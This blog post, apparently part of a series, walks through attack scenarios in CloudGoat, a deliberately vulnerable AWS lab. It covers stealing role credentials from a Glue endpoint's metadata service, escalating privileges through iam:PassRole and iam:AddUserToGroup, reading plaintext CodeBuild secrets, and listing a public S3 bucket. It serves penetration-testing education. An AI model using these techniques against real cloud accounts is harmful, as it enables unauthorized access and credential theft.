Playing with CloudGoat part 4: security nuances of AWS Glue, CodeBuild and S3 services
Today, it’s time to go through the last attractions prepared by guys from Rhino Security Labs: AWS Glue, CodeBuild, S3 as well as unused groups and roles. But, no worries — that won’t be the last episode 😉 If you don’t know what the CloudGoat is I recommend you to go through whole series starting from part 1.
The starting point of today post is the scenario when an attacker gets the SSH access to a Glue Development Endpoint. I’ve modified a little bit the default configuration of CloudGoat to be able to sequence the presented attacks. So, before we can dive into AWS hacking, let’s set up the lab.
Once you’ve deployed the default configuration of CloudGoat you may be surprised seeing an empty AWS Glue configuration. As you can find on the CloudGoat’s README.md file:
The Glue development endpoint is disabled by default due to it costing far more than the whole rest of CloudGoat to run. If you would like to enable the Glue development endpoint (estimated at $1 per hour), uncomment the final three lines of “start.sh”, uncomment the final eight lines of “kill.sh”, uncomment the final two lines of “extract_creds.py”, and uncomment the file located at “./terraform/glue.tf”.
Then you have to upload the public key to the Dev endpoint (
./keys/cloudgoat_key.pub file) — at the time of writing this post this isn’t done automatically and it’s mandatory if you want to SSH to the endpoint.
I’ve also modified a
glue_dev_endpoint role by adding a permission
iam:PassRole to its policy
policy_for_glue_role as well as I’ve added a trusted entity to
I did those modifications to make this scenario more interesting — I’ll explain it later.
After following the steps and running the
start.sh script, it’s finally time to start playing with the Glue service.
What is AWS Glue? Amazon describes it in the following way:
AWS Glue is a fully managed extract, transform, and load (ETL) service that makes it easy for customers to prepare and load their data for analytics. You can create and run an ETL job with a few clicks in the AWS Management Console. You simply point AWS Glue to your data stored on AWS, and AWS Glue discovers your data and stores the associated metadata (e.g. table definition and schema) in the AWS Glue Data Catalog. Once cataloged, your data is immediately searchable, queryable, and available for ETL.
How does it work? Firstly, you set a source of data, e.g. logs in multiple S3 buckets. AWS Glue will then crawl your data sources and construct your Data Catalog, e.g. in a JSON format. Next, the service will generate ETL code in Scala or Python to extract data from the source, transform the data to match the target schema, and load it into the target (e.g. loading data as tables to Amazon Redshift). You can develop your own scripts and to test them you can use the Glue Development Endpoint. This environment can be accessed via SSH:
ssh -i <private_key> glue@<public_address>
The today scenario starts from this point. Having a shell to Glue Development Endpoint an attacker can do any action which is allowed by the assigned role, e.g. listing all Glue Dev Endpoints:
As you can see, there is assigned role
glue_dev_endpoint, so basically an attacker with SSH access has all permissions which are assigned to the role (defined in
policy_for_glue_role). Do you remember from the part 1 how temporary credentials of assigned role can be accessed?
Just a quick recap: the metadata are available under the non-routable address http://169.254.169.254/. Let’s check out if I can reach temporary credentials of assigned role to the Dev Endpoint in the same way as I did in EC2 instance:
Using the red line I highlighted the commands which I executed and using green line I highlighted the responses. What’s interesting here, is the fact that most of the EC2 meta-data API endpoints are disabled within a Glue instance, but not the important one 🙀 The temporary credentials are always available under the name… “dummy”… no matter how the assigned role is named 😄
If you’re using the default CloudGoat configuration then this scenario can end here - at this stage, an attacker can call any
"dynamodb:*" action and nothing more. However, in my modified version an attacker can create a new Glue Development Endpoint (thanks to
iam:PassRole), but this time with a new role assigned (what is possible thanks to added trusted entity of Glue service).
You should keep in mind, that an attacker can enumerate the available roles without ANY permissions!!!
In CloudGoat there’s unused role, called
codebuild_project. Let’s assign this role to the new Glue Development Endpoint as well as upload there the public SSH key (
As you can see above the status is “PROVISIONING” — you have to wait several minutes till the endpoint will be ready to use. After that, list the endpoints to get the public IP of your new dev endpoint:
Now, it’s time to SSH to the new endpoint and that’s how I obtained new permissions (defined in policy assigned to
Amazon describes CodeBuild as:
AWS CodeBuild is a fully managed continuous integration service that compiles source code, runs tests, and produces software packages that are ready to deploy. With CodeBuild, you don’t need to provision, manage, and scale your own build servers. CodeBuild scales continuously and processes multiple builds concurrently, so your builds are not left waiting in a queue.
In other words it’s a continuous integration service which allows you to build, test and deploy projects from source, e.g. from your GitHub repository.
AWS CodeBuild provides several environment variables as well as it allows you to specify your own ones. There are available 2 types of those variables: plaintext and parameter. Sensitive values, like secrets or access keys should be stored in the Parameter Store and then retrieved from your build spec.
Let’s check out how it’s done in CloudGoat:
Looks like developers didn’t follow the best practices. Secrets like
super_secret (or even
kinda_secret 😉) should never be stored as a plaintext environmental variable, because as you can see above it can be easily displayed via AWS CodeBuild console or the AWS CLI☝️
CloudGoat is about AWS (in)security, so it would be weird if there’s no mention about the most common issue — leaks of data via publicly available content of S3 buckets. Using the
codebuild_project role I can list all available s3 buckets:
What is interesting here, is the fact that the second bucket allows for public listing. By default the bucket is empty, so I put the
ultra_secret.txt file just as an example. You can list the bucket’s content via browser and without any authentication:
If you think, that such cases are too lame to be real then I strongly encourage you to go through my own research: how I found more than 5K buckets with publicly available data and more than 1.3K buckets allowed me to (over)write there any object.
To finish all the scenarios prepared in CloudGoat I have to mention also the case with unused group:
PinpointManagement. A user with a permission to assign himself to a different group can obtain new privileges. That means, if a user Bob has a permission
iam:AddUserToGroup he can assign himself to the group
PinpointManagement . Thanks to this action, Bob can now call any
Is that all?
In so far published blog posts under “Playing with CloudGoat” series I went through *cough* hope so *cough* all AWS security issues prepared by Rhino Security Labs. For hacking AWS services I mainly used AWS CLI and some external tools. Such “manual” way of hacking wasn’t very convenient, because it requires remembering commands, their arguments and also knowing some external tools.
Ahead of us is the final episode of “Playing with CloudGoat” series, in which I’ll introduce Pacu — the AWS exploitation framework, also made by Rhino Security Labs. Using this Metasploit-like tool I’ll go through all the CloudGoat issues to show you how easier and more effective such attacks (penetration test) can be. So… as always: stay tuned!!!